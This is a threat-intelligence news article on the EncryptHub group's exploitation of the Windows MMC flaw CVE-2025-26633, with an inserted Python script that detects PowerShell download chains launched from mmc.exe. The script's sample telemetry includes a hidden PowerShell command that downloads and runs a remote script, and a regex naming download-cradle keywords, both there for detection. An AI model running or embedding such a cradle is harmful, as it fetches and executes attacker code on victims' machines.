Ongoing Threat from EncryptHub: Exploiting Windows Vulnerabilities
The cyber threat landscape continues to evolve, and the group known as EncryptHub remains at the forefront of this evolution. This Russian hacking collective has been leveraging newly discovered vulnerabilities in Microsoft Windows to deploy malicious payloads that pose significant risks to organizations.
The Exploitation of the MSC EvilTwin Vulnerability
Recent findings from Trustwave SpiderLabs reveal that EncryptHub is actively exploiting a vulnerability within the Microsoft Management Console (MMC) framework, identified as CVE-2025-26633, commonly referred to as the MSC EvilTwin vulnerability. Their tactics combine social engineering with this technical exploit to penetrate security defenses, allowing them to take control of internal systems.
Researchers Nathaniel Morales and Nikita Kazymirskyi from Trustwave noted that these actions reflect a broader trend of malicious activities that integrate social manipulation with technical exploitation techniques.
A Brief Background on EncryptHub
EncryptHub, also known as LARVA-208 or Water Gamayun, emerged as a notable threat actor in mid-2024. This financially motivated group has developed a repertoire of tactics aimed at infecting targets with stealers and other malware. Their strategies range from posting fake job offers and portfolio requests to leveraging compromised Steam games, employing various methods to gain access to sensitive information.
Technical Details of Their Latest Campaign
The latest campaign involves EncryptHub posing as IT personnel and initiating Microsoft Teams requests to their targets. This approach aims to establish unauthorized remote connections, facilitating the deployment of secondary malicious payloads through PowerShell commands.
Delivery Mechanism
Two MSC files with identical names play a pivotal role in this attack. One of these files is harmless, while the other leverages the CVE-2025-26633 vulnerability to execute malicious commands. Once the benign file is opened, it triggers the execution of the rogue MSC file, which subsequently fetches an external PowerShell script designed to gather system data, ensure persistence, and communicate with EncryptHub’s command-and-control (C2) server.
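The delivery chain above has two observable traits a defender can hunt for: mmc.exe spawning PowerShell that fetches remote content, and a pair of .msc files sharing one name in different directories. The following is an added example, not code from the Trustwave report; the telemetry field names and every sample record are constructed assumptions that loosely mirror process-creation logging such as Sysmon Event ID 1.

```python
"""Heuristic detection for the paired-MSC -> PowerShell chain described above.
Added example, not from the Trustwave report; field names and all sample records
are constructed assumptions resembling process-creation telemetry (Sysmon ID 1)."""
import re
from typing import Iterable
# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -nop -w hidden -c "iex (iwr http://203.0.113.10/s.ps1)"'},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"mmc.exe C:\Users\bob\Downloads\report.msc"},
    {"host": "ws03", "parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
]
# Constructed list of .msc files found on one host (not real data).
SAMPLE_MSC_PATHS = [
    r"C:\Users\bob\Downloads\report.msc",
    r"C:\Users\bob\AppData\Local\Temp\report.msc",
    r"C:\Windows\System32\compmgmt.msc",
]
# Command-line markers that PowerShell is fetching remote content.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|iex|invoke-webrequest|invoke-expression|downloadstring|"
    r"downloadfile|net\.webclient)\b|https?://", re.IGNORECASE)

def is_suspicious(event: dict) -> bool:
    """PowerShell spawned by mmc.exe whose command line pulls remote content."""
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    if not parent.endswith("\\mmc.exe"):
        return False
    if not (image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe")):
        return False
    return DOWNLOAD_CRADLE.search(event.get("cmdline", "")) is not None

def flagged_hosts(events: Iterable[dict]) -> list[str]:
    """Hosts on which the mmc.exe -> PowerShell download pattern was seen."""
    return sorted({e["host"] for e in events if is_suspicious(e)})

def duplicate_msc_names(paths: Iterable[str]) -> dict[str, list[str]]:
    """Names of .msc files present in more than one directory (paired-file delivery)."""
    by_name: dict[str, list[str]] = {}
    for p in paths:
        name = p.rsplit("\\", 1)[-1].lower()
        if name.endswith(".msc"):
            by_name.setdefault(name, []).append(p)
    return {n: ps for n, ps in by_name.items() if len(ps) > 1}
```

Tune the cradle regex to your environment; administrative scripts legitimately launched from MMC snap-ins (the ws03 record) should not match because they carry no remote-fetch marker.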
Payloads and Execution
This PowerShell script is capable of receiving AES-encrypted commands from the attackers. These commands are decrypted and executed directly on the compromised system, allowing for extensive control. Further complicating matters, a Go-based malware loader named SilentCrystal is also employed, which exploits the legitimate Brave Support platform to deliver additional malicious files and weaponize the CVE-2025-26633 vulnerability.
Innovative Deception Tactics
The sophistication of EncryptHub’s operations is evident in their use of bogus video conferencing platforms like RivaTalk to trick users into downloading harmful installers. These installers typically contain legitimate binaries that have been manipulated to introduce malicious components, facilitating further infiltration of the victim’s system.
Conclusion of Malicious Operations
Once executed, these installers gather extensive system metadata and await additional PowerShell instructions, which may be encoded and run, granting attackers unhindered access to the system. They also generate deceptive network traffic patterns to mask their communications with the C2 server, complicating detection efforts.
Importance of Layered Defense
The EncryptHub group exemplifies a well-resourced, adaptive adversary that employs multiple techniques—social engineering, trusted platform abuse, and vulnerability exploitation—to maintain persistent control over systems. Trustwave emphasizes the critical need for layered defense strategies, continuous threat intelligence updates, and robust user awareness training to mitigate the risks posed by such advanced threats.
In an environment where cyber threats are becoming increasingly sophisticated, understanding and addressing these dynamics is essential for organizations seeking to safeguard their digital assets.